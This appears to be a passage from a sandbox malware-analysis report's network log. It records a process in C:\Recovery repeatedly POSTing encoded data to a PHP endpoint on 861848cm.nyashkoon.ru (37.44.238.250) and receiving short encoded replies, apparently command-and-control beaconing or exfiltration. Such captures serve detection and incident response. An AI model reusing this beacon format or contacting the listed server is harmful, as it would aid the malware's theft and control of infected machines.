                                                                    Nov 6, 2024 03:38:29.897387028 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:30.250782967 CET1012OUTData Raw: 53 54 5a 54 56 5a 50 5d 5a 5f 52 51 54 58 5b 59 55 57 59 58 51 50 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: STZTVZP]Z_RQTX[YUWYXQPRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&//&<80_(4)*>[&%8<_",2+39,_!':^2'X$.Q-.
                                                                    Nov 6, 2024 03:38:30.713701963 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:30.786015034 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    79192.168.2.44996937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:31.077939034 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:31.422900915 CET1012OUTData Raw: 56 51 5a 55 53 5f 55 5e 5a 5f 52 51 54 58 5b 5f 55 55 59 5c 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZUS_U^Z_RQTX[_UUY\Q^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^;<"+83> <>=_*:3^;7,&(?.&;#$:]')'X$.Q-.
                                                                    Nov 6, 2024 03:38:31.884031057 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:31.959028006 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    80192.168.2.44997737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:32.079571962 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:32.438370943 CET1012OUTData Raw: 53 52 5a 59 56 59 50 5c 5a 5f 52 51 54 5e 5b 5f 55 5c 59 5f 51 55 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZYVYP\Z_RQT^[_U\Y_QUR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;&S=(0(3)**6$8#?(-3-6,\4'&'X$.Q-6
                                                                    Nov 6, 2024 03:38:32.884814978 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:32.965516090 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    81192.168.2.44998437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:33.583528996 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:33.938370943 CET1008OUTData Raw: 56 55 5f 5f 53 5f 50 5b 5a 5f 52 51 54 5a 5b 5d 55 51 59 57 51 56 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VU__S_P[Z_RQTZ[]UQYWQVR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%],2R+;+>38):=Y*-9'87#9).'[90 49')'X$.Q-
                                                                    Nov 6, 2024 03:38:34.392713070 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:34.468540907 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    82192.168.2.44998537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:33.589720964 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:33.938455105 CET1276OUTData Raw: 56 5f 5f 5e 56 59 50 5c 5a 5f 52 51 54 52 5b 5c 55 57 59 5d 51 5e 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V__^VYP\Z_RQTR[\UWY]Q^R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/?(< ]=!_*=%8+ ?=(\:,_ 7-1'X$.Q-
                                                                    Nov 6, 2024 03:38:34.411118031 CET25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    83192.168.2.44999137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:34.601540089 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:34.953922033 CET1012OUTData Raw: 56 5e 5a 5d 56 5a 50 5c 5a 5f 52 51 54 5b 5b 5a 55 56 59 5a 51 53 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^Z]VZP\Z_RQT[[ZUVYZQSRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/<*R<+ +38\*>."38_"?)+>3\95( '2)'X$.Q-"
                                                                    Nov 6, 2024 03:38:35.410927057 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:35.487087011 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    84192.168.2.44999937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:35.615499973 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:35.969608068 CET1008OUTData Raw: 56 57 5f 58 53 5c 50 5c 5a 5f 52 51 54 5a 5b 5e 55 53 59 5a 51 5e 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VW_XS\P\Z_RQTZ[^USYZQ^R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_/&U?;8\+<>6*-.%((Y71</Z-%0#.\%)'X$.Q-6
                                                                    Nov 6, 2024 03:38:36.544732094 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:36.545187950 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:36.545218945 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    85192.168.2.45000337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:36.751256943 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:37.110300064 CET1012OUTData Raw: 53 56 5f 5f 56 5b 50 53 5a 5f 52 51 54 59 5b 5a 55 54 59 5e 51 5f 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SV__V[PSZ_RQTY[ZUTY^Q_R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,-<($(38Z(:2=-%8?7*Q(?Y.C/7')'X$.Q-*
                                                                    Nov 6, 2024 03:38:37.566184044 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:37.640352964 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    86192.168.2.45000937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:37.873390913 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:38.219842911 CET1012OUTData Raw: 53 54 5f 58 53 5f 50 52 5a 5f 52 51 54 5f 5b 5b 55 57 59 5d 51 5e 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: ST_XS_PRZ_RQT_[[UWY]Q^RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^85<84?0+=)=Y=-)$^",2((.5? 7*\2)'X$.Q-2
                                                                    Nov 6, 2024 03:38:38.675180912 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:38.750847101 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    87192.168.2.45001937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:39.267858028 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    88192.168.2.45002137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:39.491946936 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:39.844563961 CET1252OUTData Raw: 53 52 5a 55 56 5b 55 5e 5a 5f 52 51 54 5f 5b 52 55 51 59 56 51 56 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZUV[U^Z_RQT_[RUQYVQVR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\8<>S?(3+0'===-]$877/+=<-<\!'%'X$.Q-2
                                                                    Nov 6, 2024 03:38:40.302485943 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:40.374916077 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 1a 2a 39 39 01 27 15 20 16 2a 00 2e 07 28 56 24 04 2d 22 34 1c 3d 0a 20 10 2a 2b 30 1b 34 06 3f 5c 36 0c 3d 5a 37 32 20 06 3c 01 21 5f 05 1d 3a 02 33 29 2f 09 2b 22 29 05 2a 27 06 08 26 1e 20 08 3e 05 2a 5b 34 04 03 0d 25 3e 0c 00 25 0b 2f 55 2b 42 21 5c 2e 01 0d 1d 25 10 2a 57 09 16 20 50 24 30 2f 5b 28 31 24 00 30 3e 31 12 24 39 38 0f 3e 3c 38 04 37 24 0c 15 2b 30 23 11 21 37 3d 01 33 39 3e 43 32 58 34 0b 3f 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: *99' *.(V$-"4= *+04?\6=Z72 <!_:3)/+")*'& >*[4%>%/U+B!\.%*W P$0/[(1$0>1$98><87$+0#!7=39>C2X4?&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    89192.168.2.45002237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:39.609935045 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:39.953953981 CET1012OUTData Raw: 56 50 5a 5a 56 59 50 58 5a 5f 52 51 54 5d 5b 5f 55 5d 59 5e 51 57 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZZVYPXZ_RQT][_U]Y^QWRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_/><^+>38=?=$("?>U<./X-C3 $-29'X$.Q-
                                                                    Nov 6, 2024 03:38:40.419034958 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:40.495553017 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    90192.168.2.45002837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:40.625998974 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:40.985196114 CET1012OUTData Raw: 56 5e 5a 5a 56 57 50 53 5a 5f 52 51 54 5b 5b 5d 55 50 59 59 51 53 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^ZZVWPSZ_RQT[[]UPYYQSRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X,-+;+30=*5X)>:]$88^#=?=,-54'*1'X$.Q-"
                                                                    Nov 6, 2024 03:38:41.439735889 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:41.516890049 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    91192.168.2.45003437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:41.918498993 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:42.266490936 CET1008OUTData Raw: 53 56 5f 5b 53 58 55 58 5a 5f 52 51 54 5a 5b 5f 55 51 59 57 51 5f 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SV_[SXUXZ_RQTZ[_UQYWQ_R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\//(++<#?)*[)[=%+<X#<-<.C8^ -%'X$.Q-2
                                                                    Nov 6, 2024 03:38:42.731484890 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:42.808444023 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    92192.168.2.45004037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:42.940005064 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:43.297683954 CET1012OUTData Raw: 53 55 5a 5c 56 5b 50 5d 5a 5f 52 51 54 5b 5b 53 55 53 59 5d 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ\V[P]Z_RQT[[SUSY]QPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,/%(+8()\)Z*="Z3; /"+7],%##&]29'X$.Q-"
                                                                    Nov 6, 2024 03:38:43.761729956 CET25INHTTP/1.1 100 Continue
